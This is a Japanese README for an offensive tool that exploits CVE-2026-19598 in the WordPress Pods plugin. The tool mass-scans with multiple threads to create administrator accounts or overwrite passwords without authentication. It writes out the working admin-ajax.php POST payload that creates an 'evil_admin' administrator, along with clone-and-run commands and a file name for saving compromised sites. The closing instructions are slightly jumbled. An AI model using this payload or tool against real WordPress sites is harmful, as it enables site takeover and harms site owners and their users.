
CVE-2026-19598をWordPressのPodsプラグインで悪用し、認証されていないAJAXリクエストを介して管理者アカウントを作成したりパスワードを上書きしたりします。マススキャンとマルチスレッド対応です。
重大な未認証権限昇格(CVSS 9.8)— WordPress Podsプラグイン ≤ 3.3.9
このツールは、WordPressのPodsプラグインにおけるCVE-2026-19598を悪用します。この脆弱性により、未認証の攻撃者がadmin-ajax.phpエンドポイントを介して新しい管理者アカウントを作成したり、既存のユーザーパスワードを上書きしたりすることが可能になります。
| プロパティ | 値 |
|---|---|
| CVE ID | CVE-2026-19598 |
| CVSSスコア | 9.8(Critical) |
| CWE | CWE-284 — 不適切なアクセス制御 |
| 影響を受ける製品 | WordPress Podsプラグイン ≤ 3.3.9 |
| 修正済みバージョン | 3.3.9.1 |
| 認証要件 | 不要(未認証) |
| ステータス | 活発な悪用 |
この脆弱性はpods_admin AJAXアクションに存在します。不適切な権限チェックのため、meta-box-loaderパラメータが存在する場合、save_userメソッドは認証なしで呼び出される可能性があります。これにより、攻撃者は以下を行うことができます:
POST /wp-admin/admin-ajax.php action=pods_admin method=save_user meta-box-loader=1 user_login=evil_admin user_pass=Hacked123! role=administrator
このプラグインは、リクエストを行っているユーザーが適切な権限を持っているかを検証できず、meta-box-loaderパラメータによって意図されたセキュリティチェックがバイパスされます。
pods_pwned.txtに保存requestsを使用# リポジトリをクローン
git clone https://github.com/0xCyp1337/CVE-2026-19598.git
cd CVE-2026-19598
python3 CVE-2026-19598.py
# 依存関係をインストール(requestsのみ必要)
pip install requests